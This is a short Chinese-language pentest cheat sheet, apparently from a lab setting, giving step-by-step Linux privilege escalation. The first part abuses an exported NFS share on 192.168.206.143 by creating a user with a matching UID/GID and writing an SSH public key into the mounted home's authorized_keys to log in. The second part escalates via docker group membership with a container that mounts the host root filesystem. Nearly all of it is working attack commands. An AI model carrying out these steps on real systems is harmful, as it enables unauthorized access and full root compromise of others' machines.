nfs 挂载提权
目标机器192.168.206.143 需开启2049 nfs端口
在攻击机kali安装nfs:
sudo apt-get install nfs-common
查看目标开放的文件夹
showmount -e 192.168.206.143
回显:/home/peter * 说明可挂载/home/peter的所有目录
创建用户(root权限下)
在本机创建一个peter用户并且uid为1001 gid为1005即可
创建组并指定组GID:
groupadd -g 1005 peter
创建用户并指定uid以及gid:
adduser peter -uid 1001 -gid 1005
生成公钥和私钥
ssh-keygen
将公钥复制到创建的挂载目录下
cat /home/peter/.ssh/id_rsa.pub > /111/.ssh/authorized_keys
赋值权限
chmod 700 .ssh
chmod 600 authorized_keys
用ssh 连接
ssh peter@192.168.206.143
docker 提权
Docker 运行的所有命令都是需要 sudo 来运行,那是因为 docker 需要 root 权限才能跑。
Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。
如果一个服务器有一个普通的用户,并且这个用户加入了 docker 组,则这个用户已经是 root 了,默认情况下,Docker 软件包是会默认添加一个 docker 用户组
命令: id 查看当前用户组信息
查看用户组 cat /etc/group
提权(需要能够从外网拉镜像):
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease